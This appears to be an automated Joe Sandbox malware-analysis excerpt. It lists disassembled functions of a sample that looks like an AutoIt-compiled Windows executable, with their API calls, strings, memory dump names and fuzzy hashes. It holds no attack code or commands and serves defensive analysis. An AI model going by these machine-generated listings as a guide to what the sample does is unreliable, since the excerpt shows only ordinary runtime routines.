                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EC92D0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
                      • Instruction ID: 774fcfefd115aabe7ccf93adfced9bd64e539d14a0a1dae58d8fd01e4474e9e7
                      • Opcode Fuzzy Hash: 9f5236ff90ce3d07491db8c9c530133a70d0bb2fd59a9c42d65b4527d271dc69
                      • Instruction Fuzzy Hash: 5101A772A4510477CB18E6A0DA87EFF77EC9F11300F246119B85673192DA525F0D9272
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp
                      • String ID: #32770
                      • API String ID: 2292705959-463685578
                      • Opcode ID: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
                      • Instruction ID: 7e215e0072ce593a6c3d4f73fd19735cc5712508706492544e3214a389bdb52a
                      • Opcode Fuzzy Hash: 39b0c138df0cc53d32bda067fd43bc559f264a03e4efdc43f16d75e7a23318c6
                      • Instruction Fuzzy Hash: 86E09B7250432D5BD720AA99AC45AA7F7ACEB45771F000157F914E3150D560994587D1
                      APIs
                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EC81CA
                        • Part of subcall function 00E93598: _doexit.LIBCMT ref: 00E935A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Message_doexit
                      • String ID: AutoIt$Error allocating memory.
                      • API String ID: 1993061046-4017498283
                      • Opcode ID: 2c72935628ed0652a6acf8d5e358d4ab773ab4dbd50b2804428ca4d7d41f772a
                      • Instruction ID: e9eabe7a518316a1fa04a605c791a4bfbf84cc151ee41289832b74995047b759
                      • Opcode Fuzzy Hash: 2c72935628ed0652a6acf8d5e358d4ab773ab4dbd50b2804428ca4d7d41f772a
                      • Instruction Fuzzy Hash: 1ED012323C531836D61432A56D06FC576C84B05B55F549015BB08B55D38ED6D98292DE
                      APIs
                        • Part of subcall function 00EAB564: _memset.LIBCMT ref: 00EAB571
                        • Part of subcall function 00E90B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EAB540,?,?,?,00E7100A), ref: 00E90B89
                      • IsDebuggerPresent.KERNEL32(?,?,?,00E7100A), ref: 00EAB544
                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E7100A), ref: 00EAB553
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EAB54E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                      • API String ID: 3158253471-631824599
                      • Opcode ID: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
                      • Instruction ID: 26bb2b720dde5b6a93a2eb7a3209c4fa92a34538d06b15c6b22f0ed81587be77
                      • Opcode Fuzzy Hash: a8ca204651c4726d77a7ec6e0baadfd8959b9f4a646115f3a47e3c72435874c9
                      • Instruction Fuzzy Hash: 4EE09270600310CFD760DF69E4043827BE4AF04714F04C96CE486E7362EBB4E448CB61
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EF5BF5
                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EF5C08
                        • Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
                      • Instruction ID: 572c284a5cb40fa9d1c3e67d526b74d91ccbc41531b050f7abd80919048ab655
                      • Opcode Fuzzy Hash: 6f3dcbf021b500f03856540ff37e4c497780c12d16ce990deb1909e32c479dd7
                      • Instruction Fuzzy Hash: ADD0C932388311BBE774AB71AC1BFA76A54AF40B61F110825B656BA2D0D9E49805C651